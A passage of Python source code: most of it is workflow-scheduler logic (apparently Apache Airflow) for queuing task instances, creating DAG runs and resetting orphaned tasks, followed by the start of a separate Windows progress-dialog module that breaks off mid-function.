.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = sched.scheduler()
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
timers.enter(delay, 1, repeat, args, kwargs)
timers.enter(delay, 1, repeat, arguments, kwargs)
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
for attempt in run_with_db_retries(logger=self.log):
with attempt:
try:
self.log.debug(
"Running SchedulerJob._get_dagmodels_and_create_dagruns with retries. "
"Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
dag_runs = DagRun.next_dagruns_to_examine(session)
except OperationalError:
session.rollback()
raise
return dag_runs
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
for attempt in run_with_db_retries(logger=self.log):
with attempt:
try:
self.log.debug(
"Running SchedulerJob._create_dagruns_for_dags with retries. " "Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
except OperationalError:
session.rollback()
raise
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exist so that we don't attempt to create
# duplicate dag runs
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date)
.filter(
tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
)
.all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check DagRun existence instead
# of catching an Integrity error and rolling back the session i.e
# we need to run self._update_dag_next_dagruns if the Dag Run already exists or if we
# create a new one. This is so that in the next Scheduling loop we try to create new runs
# instead of falling in a loop of Integrity Error.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
# Issue SQL/finish "Unit of Work", but let @provide_session
# commit (or if passed a session, let caller decide when to commit
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
|
async_processor.py
|
# An async command processor
from dlgutils import *
import win32gui, win32api, win32con, commctrl
import win32process
import time
import processors
verbose = 0
IDC_START = 1100
IDC_PROGRESS = 1101
IDC_PROGRESS_TEXT = 1102
MYWM_SETSTATUS = win32con.WM_USER+11
MYWM_SETWARNING = win32con.WM_USER+12
MYWM_SETERROR = win32con.WM_USER+13
MYWM_FINISHED = win32con.WM_USER+14
# This is called from another thread - hence we need to jump through hoops!
class _Progress:
def __init__(self, processor):
self.hdlg = processor.window.hwnd
self.hprogress = processor.GetControl(processor.statusbar_id)
self.processor = processor
self.stopping = False
self.total_control_ticks = 40
self.current_stage = 0
self.set_stages( (("", 1.0),) )
def set_stages(self, stages):
self.stages = []
start_pos = 0.0
for name, prop in stages:
stage = name, start_pos, prop
start_pos += prop
self.stages.append(stage)
assert abs(start_pos-1.0) < 0.001, (
"Proportions must add to 1.0 (%r,%r,%r)" %
(start_pos, stages, start_pos-1.0))
def _next_stage(self):
if self.current_stage == 0:
win32api.PostMessage(self.hprogress, commctrl.PBM_SETRANGE, 0, MAKELPARAM(0,self.total_control_ticks))
win32api.PostMessage(self.hprogress, commctrl.PBM_SETSTEP, 1, 0)
win32api.PostMessage(self.hprogress, commctrl.PBM_SETPOS, 0, 0)
self.current_stage += 1
assert self.current_stage <= len(self.stages)
def _get_current_stage(self):
return self.stages[self.current_stage-1]
def set_max_ticks(self, m):
# skip to the stage.
self._next_stage()
self.current_stage_max = m
self.current_stage_tick = -1 # ready to go to zero!
# if earlier stages stopped early, skip ahead.
self.tick()
def tick(self):
if self.current_stage_tick < self.current_stage_max:
# Don't let us go beyond our stage max
self.current_stage_tick += 1
# Calc how far through this stage.
this_prop = float(self.current_stage_tick) / self.current_stage_max
# How far through the total.
stage_name, start, end = self._get_current_stage()
# Calc the perc of the total control.
stage_name, start, prop = self._get_current_stage()
total_prop = start + this_prop * prop
# How may ticks is this on the control (but always have 1, so the
# user knows the process has actually started.)
control_tick = max(1,int(total_prop * self.total_control_ticks))
if verbose:
